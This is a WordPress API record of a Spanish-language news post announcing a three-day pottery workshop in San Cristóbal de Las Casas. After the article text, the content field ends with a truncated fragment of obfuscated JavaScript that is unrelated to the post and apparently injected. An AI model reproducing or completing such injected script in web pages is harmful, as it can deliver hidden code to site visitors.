{"id":25541,"date":"2025-12-01T02:51:34","date_gmt":"2025-12-01T02:51:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25541"},"modified":"2025-12-01T02:51:34","modified_gmt":"2025-12-01T02:51:34","slug":"invitan-al-taller-intensivo-de-alfareria-en-la-ensenanza","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25541","title":{"rendered":"Invitan al taller intensivo de alfarer\u00eda en La Ense\u00f1anza"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000467518-576x1024.jpg\" alt=\"\" class=\"wp-image-25542\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000467518-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000467518-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000467518-768x1366.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000467518-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000467518.jpg 899w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Exploraci\u00f3n creativa y conexi\u00f3n con la tierra en \u201cAlfarero por un D\u00eda\u201d<\/p>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<\/p>\n\n\n\n<p>30 de noviembre del 2025. San Crist\u00f3bal de Las Casas.- Ericka Del R\u00edo, creadora del proyecto \u201cAlfarero por un D\u00eda\u201d, anunci\u00f3 la realizaci\u00f3n de un taller intensivo de alfarer\u00eda que se llevar\u00e1 a cabo del 2 al 4 de diciembre, de 16:00 a 19:00 horas, en La Ense\u00f1anza, Casa de la Ciudad. La propuesta est\u00e1 dirigida a personas de todas las edades interesadas en acercarse al trabajo con la tierra como una forma de expresi\u00f3n art\u00edstica y exploraci\u00f3n sensorial.<\/p>\n\n\n\n<p>En entrevista, Del R\u00edo explic\u00f3 que el objetivo del taller es que los asistentes descubran y fortalezcan sus habilidades manuales mientras desarrollan una pieza \u00fanica. Se\u00f1al\u00f3 que se trata de un \u201cgimnasio cerebral\u201d que impulsa la creatividad mediante el dise\u00f1o y modelado de objetos personales, sin que sea necesaria experiencia previa en el oficio.<\/p>\n\n\n\n<p>La instructora destac\u00f3 que los participantes trabajar\u00e1n con una t\u00e9cnica mixta de alfarer\u00eda, que combina m\u00e9todos tradicionales y contempor\u00e1neos para ampliar las posibilidades est\u00e9ticas dentro de esta disciplina. Afirm\u00f3 que el acompa\u00f1amiento personalizado es clave para que cada persona encuentre su propio ritmo y estilo.<\/p>\n\n\n\n<p>Finalmente, inform\u00f3 que las reservaciones ya est\u00e1n disponibles al n\u00famero 462 420 27 96, e invit\u00f3 al p\u00fablico a asegurar su lugar debido a que los cupos son limitados.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Exploraci\u00f3n creativa y conexi\u00f3n con la tierra en \u201cAlfarero por un D\u00eda\u201d Yolanda Rodr\u00edguez\/ Corresponsal 30 de noviembre del 2025. San Crist\u00f3bal de Las Casas.- Ericka Del R\u00edo, creadora del proyecto \u201cAlfarero por un D\u00eda\u201d, anunci\u00f3 la realizaci\u00f3n de un taller intensivo de alfarer\u00eda que se llevar\u00e1 a cabo del 2 al 4 de diciembre, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25542,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-25541","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25541","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25541"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25541\/revisions"}],"predecessor-version":[{"id":25543,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25541\/revisions\/25543"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25542"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}